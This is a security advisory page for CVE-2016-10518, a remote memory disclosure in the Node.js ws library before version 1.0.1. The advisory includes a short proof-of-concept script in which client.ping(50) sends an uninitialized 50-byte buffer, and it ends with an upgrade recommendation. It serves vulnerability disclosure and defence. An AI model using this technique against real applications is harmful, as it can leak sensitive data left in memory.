Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
osvGoogleOSV:GHSA-2MHH-W6Q8-5HXW
HistoryFeb 18, 2019 - 11:56 p.m.

Remote Memory Disclosure in ws

2019-02-1823:56:42
Google
osv.dev
6

0.002 Low

EPSS

Percentile

51.9%

JSON

Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.

In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.

Proof of Concept

var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client. 
  })
})

Recommendation

Update to version 1.0.1 or greater.

CPENameOperatorVersion
wslt1.0.1

Related

ubuntucve 1
github 1
debiancve 1
prion 1
osv 1
cvelist 1
nvd 1
cve 1
nodejs 1
ubuntucve
ubuntucve
CVE-2016-10518
2018-05-31 00:00:00
github
github
Remote Memory Disclosure in ws
2019-02-18 23:56:42
debiancve
debiancve
CVE-2016-10518
2018-05-31 20:29:00
prion
prion
Design/Logic Flaw
2018-05-31 20:29:00
osv
osv
CVE-2016-10518
2018-05-31 20:29:00
cvelist
cvelist
CVE-2016-10518
2018-04-26 00:00:00
nvd
nvd
CVE-2016-10518
2018-05-31 20:29:00
cve
cve
CVE-2016-10518
2018-05-31 20:29:00
nodejs
nodejs
Remote Memory Disclosure
2016-01-04 18:29:33

0.002 Low

EPSS

Percentile

51.9%

JSON
Related for OSV:GHSA-2MHH-W6Q8-5HXW
ubuntucve1github1debiancve1prion1osv1cvelist1nvd1cve1nodejs1